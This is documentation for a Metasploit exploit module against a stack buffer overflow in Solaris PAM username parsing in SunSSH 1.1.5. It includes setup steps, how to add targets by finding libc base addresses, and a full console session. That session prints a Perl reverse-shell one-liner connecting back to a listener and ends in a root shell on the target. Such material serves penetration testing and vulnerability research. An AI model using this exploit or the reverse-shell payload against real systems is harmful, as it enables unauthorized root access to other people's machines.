Vulnerable Application
Description
This module exploits a stack-based buffer overflow in the Solaris PAM library's username parsing code, as used by the SunSSH daemon when the keyboard-interactive authentication method is specified.
Tested against SunSSH 1.1.5 on Solaris 10u11 1/13 (x86) in VirtualBox, VMware Fusion, and VMware Player. Bare metal untested. Your addresses may vary.
Setup
Download and install Solaris 10u11 1/13 (x86) in VMware or VirtualBox. You will need an Oracle account.
SunSSH should already be installed and running when you start the system.
Adding new targets
To add a new target, you must find the libc base address for sshd.
bash-3.2
FEB80000 1088K r-x-- /lib/libc.so.1
FEC90000 32K rwx-- /lib/libc.so.1
FEC98000 8K rwx-- /lib/libc.so.1
bash-3.2
The libc base address for sshd is 0xfeb80000 in this example.
Verification Steps
Follow Setup and Scenarios.
Targets
0
SunSSH 1.1.5 / Solaris 10u11 1/13 (x86) / VMware
1
SunSSH 1.1.5 / Solaris 10u11 1/13 (x86) / VirtualBox
Scenarios
SunSSH 1.1.5 / Solaris 10u11 1/13 (x86) / VirtualBox
msf6 > use exploit/solaris/ssh/pam_username_bof
[*] Using configured payload cmd/unix/reverse_perl
msf6 exploit(solaris/ssh/pam_username_bof) > show targets
Exploit targets:
Id Name
-- ----
0 SunSSH 1.1.5 / Solaris 10u11 1/13 (x86) / VMware
1 SunSSH 1.1.5 / Solaris 10u11 1/13 (x86) / VirtualBox
msf6 exploit(solaris/ssh/pam_username_bof) > set target 1
target => 1
msf6 exploit(solaris/ssh/pam_username_bof) > options
Module options (exploit/solaris/ssh/pam_username_bof):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 22 yes The target port
Payload options (cmd/unix/reverse_perl):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
1 SunSSH 1.1.5 / Solaris 10u11 1/13 (x86) / VirtualBox
msf6 exploit(solaris/ssh/pam_username_bof) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf6 exploit(solaris/ssh/pam_username_bof) > set rport 2222
rport => 2222
msf6 exploit(solaris/ssh/pam_username_bof) > set lhost 192.168.123.1
lhost => 192.168.123.1
msf6 exploit(solaris/ssh/pam_username_bof) > run
[+] perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"192.168.123.1:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'
[*] Started reverse TCP handler on 192.168.123.1:4444
[*] Executing automatic check (disable AutoCheck to override)
[*] Using auxiliary/scanner/ssh/ssh_version as check
[+] 127.0.0.1:2222 - SSH server version: SSH-2.0-Sun_SSH_1.1.5 ( service.version=1.1.5 service.vendor=Sun service.product=SSH os.vendor=Sun os.family=Solaris os.product=Solaris os.cpe23=cpe:/o:sun:solaris:- service.protocol=ssh fingerprint_db=ssh.banner )
[*] 127.0.0.1:2222 - Scanned 1 of 1 hosts (100% complete)
[+] The target appears to be vulnerable. SunSSH 1.1.5 / Solaris 10u11 1/13 (x86) / VirtualBox is a compatible target.
[*] Exploiting SunSSH 1.1.5 / Solaris 10u11 1/13 (x86) / VirtualBox
[*] Yeeting cmd/unix/reverse_perl at 127.0.0.1:2222
[*] Command shell session 1 opened (192.168.123.1:4444 -> 192.168.123.1:57474) at 2020-12-07 01:31:34 -0600
id
uid=0(root) gid=0(root)
uname -a
SunOS vagrant-solaris10.dev 5.10 Generic_147148-26 i86pc i386 i86pc
